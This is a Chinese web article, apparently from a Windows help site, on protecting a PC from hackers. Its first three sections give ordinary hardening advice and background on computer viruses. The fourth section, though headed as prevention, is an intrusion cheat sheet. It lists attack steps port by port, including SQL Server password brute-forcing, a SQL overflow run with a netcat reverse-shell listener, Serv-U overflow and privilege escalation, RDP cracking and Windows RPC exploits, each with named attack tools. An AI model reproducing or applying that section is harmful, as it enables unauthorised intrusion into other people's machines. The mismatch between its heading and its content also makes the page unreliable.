1.如何防止个人电脑被入侵
1、安装杀毒软件。
有些黑客是通过木马窃取用户资料的,也有一些杀毒软件自带有防黑技术。所以,安装建议杀毒软件。
2、安装安全辅助软件。并把监控全部打开。
3、安装正版操作系统。盗版的很多有后门。
4、定期安装安全补丁。微软每隔一段时间就会发布安全补丁更新,很多第三方的软件也是如此。
5、设置系统登录密码。在控制面板里面设置,并禁用guest账户。
6、关闭磁盘共享。可以通过dos命令(开始——运行,输入cmd,回车,输入 net share c$ /delete (再把C换D、E、F等,依次下去)),也可以在管理里的共享文件夹关闭。
7、打开防火墙。建议正版windows用户开启。
8、关闭远程访问。右键单击“我的电脑”——“属性”——“远程”,把“允许远程用户访问此计算机”前面的钩去掉。
9、不要乱进网站。特别是一些QQ群上乱发的网站。
2.怎样防止黑客入侵电脑 九个设置让电脑远离黑客
让电脑远离黑客,可以用杀毒软件和安全卫士。
电脑病毒是指编制者在电脑程序中插入的破坏电脑功能或者破坏数据的,影响电脑使用并且能够自我复制的一组电脑指令或程序代码。与生物中的病毒不一样,电脑病毒不是天然存在的,是某些人利用电脑软件和硬件固有的脆弱性编制的一组指令集或程序代码。它能通过某种途径潜伏在电脑的存储介质里,当达到某种条件时被激活,通过修改其它程序的方法把恶意代码或程序放入其它程序中,从而感染这些程序。如“熊猫烧香”是病毒的典型代表。
现在已经发现并正式命名的电脑病毒有几百种,如耶路撒冷、巴基斯坦智囊、维也纳、冰岛人、大麻、磁盘杀手、快乐的星期天、小球、疯狂拷贝、下雨、音乐、1505、1704、648、405。
电脑病毒按其产生的后果分为良性病毒和恶性病毒。良性病毒发作时不破坏系统数据,只占用系统资源的病毒,一般只是占用电脑资源,产生一些无所谓的消耗,或干扰机器的运行,如小球病毒。恶性病毒一旦发作便会破坏数据或系统的病毒,如大麻病毒等。
以病毒的寄生方式分类,可以分为操作系统型病毒、外壳病毒、入侵病毒和源码病毒。
操作系统型病毒——运行时,用自己的逻辑部分取代部分操作系统的程序模块,如大麻病毒、磁盘杀手等。
外壳病毒——把病毒自身包围在主程序的四周,对原来的程序不做修改,在运行主程序时,病毒首先进入内存。如耶路撒冷、维也纳、快乐的星期天等。
入侵病毒——侵入到现有程序之中,实际上把病毒插入到主程序中去。
源码病毒——在程序被编译之前插入到一些编程语言编写的程序中。
电脑病毒的传染途径通常有三种:软盘的互换使用、硬盘的感染和电脑网络的传染。
电脑病毒主要寄生在磁盘的引导扇区、可执行文件、硬盘的主引导扇区中。
电脑感染了病毒后,程序装入的时间比平时长很多,可执行程序的长度增加,磁盘访问的时间比平时长,有异常的磁盘访问,有规律地发现异常信息,可用系统空间不断变小,磁盘的不可用数增多,数据和程序丢失,打印时出现问题,频繁死机,磁盘的卷名发生了变化,使用关闭写保护的软盘时屏幕上出现软盘写保护的信息,异常要求输入口令,机器发出怪叫声,command.com、autoexec.bat、config.sys等文件已经被修改,出现异常的隐含文件。
电脑一旦染上了病毒就必须予以清除。杀毒软件也叫做反病毒软件和防毒软件,是用于消除电脑病毒、特洛伊木马和恶意软件的一类软件。杀毒软件通常集成监控识别、病毒扫描清除和自动升级等功能,有的杀毒软件还带有数据恢复等功能,是电脑防御系统的重要组成部分。
主流的杀毒软件有360、金山毒霸、瑞星杀毒软件等,集合了杀毒、防毒、实时监控和防火墙功能。
360杀毒软件的主界面,简洁大方,功能列表一目了然,单击【快速扫描】按钮,进入查杀状态。
杀毒结束后,会给出杀毒报告,根据提示进行相应的操作。
杀毒的基本原理是把磁盘上的文件与病毒库里的病毒特征进行对比,在满足特点后认定为病毒,杀毒软件默认进行杀毒操作,并把病毒进行隔离。
杀毒软件处于启用状态,在状态栏的右端显示有小图标,右击这个图标,会给出相应快捷菜单列表,可以根据需要有针对性地启用杀毒功能。
发现病毒越早越好。能够在病毒产生危害之前发现和排除它,可以使系统免受危害。能够在病毒广泛传播之前发现它,可以使系统修复的任务较轻,较容易。病毒在系统内存在的时间越长,产生的危害就越大。
3.如何防止电脑被黑客入侵
安装杀毒软件。有些黑客是通过木马窃取用户资料的,也有一些杀毒软件自带有防黑技术。所以,安装建议杀毒软件。
安装安全辅助软件。如QQ电脑管家、金山卫士、360安全卫士等,并把监控全部打开。
安装正版操作系统。盗版的很多有后门。
定期安装安全补丁。微软每隔一段时间就会发布安全补丁更新,很多第三方的软件也是如此。
设置系统登录密码。在控制面板里面设置,并禁用guest账户。
关闭磁盘共享。可以通过dos命令(开始——运行,输入cmd,回车,输入 net share c$ /delete (再把C换D、E、F等,依次下去)),也可以在管理里的共享文件夹关闭。
打开防火墙。建议正版windows用户开启。
关闭远程访问。右键单击“我的电脑”——“属性”——“远程”,把“允许远程用户访问此计算机”前面的钩去掉。
不要乱进网站。特别是一些QQ群上乱发的网站。
4.如何防止别人入侵计算机
开启防火墙,关闭一些常用来入侵的端口,如3389
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
转载请注明出处windows之家 » win10如何防止有人侵入电脑